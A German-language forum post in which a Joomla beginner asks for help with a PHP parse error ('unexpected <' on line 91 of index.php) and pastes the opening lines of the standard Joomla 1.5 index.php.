Parse error: syntax error

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Parse error: syntax error

    hallo liebe gemeinde,

    ich bin neu hier und nicht sicher, ob mein problem hier richtig ist... wenn nicht, bitte ich um eine verschiebung ins richtige thema...

    seit ein paar tagen versuche ich mich an einer webseite mit joomla. ich bin totaler anfänger muss ich gestehen - habe keine ahnung von joomla und php und suche mich bei problemen stundenlang durch internet was richtig spass macht wenn ich wieder was gelöst habe... aber jetzt bin ich am verzweifeln. seit einigen tagen steht auf meiner seite nur noch folgender ausdruck:

    Parse error: syntax error, unexpected '<' in /data/multiserv/users/350095/projects/574690/www/index.php on line 91

    ein wenig gegoogelt habe ich gesehen, dass das öfters mal auftritt aber eine lösung dafür habe ich nicht gefunden. nach dem was ich bisher weiß muss es also ein fehler in der syntax der zeile 91 sein... aber was??

    hier mal die ganze index.php - vielleicht könnt ihr mir helfen (bitte, bitte...)

    <?php
    /**
    * @version $Id: index.php 11407 2009-01-09 17:23:42Z willebil $
    * @package Joomla
    * @copyright Copyright (C) 2005 - 2009 Open Source Matters. All rights reserved.
    * @license GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */
    // Set flag that this is a parent file
    define( '_JEXEC', 1 );
    define('JPATH_BASE', dirname(__FILE__) );
    define( 'DS', DIRECTORY_SEPARATOR );
    require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
    require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );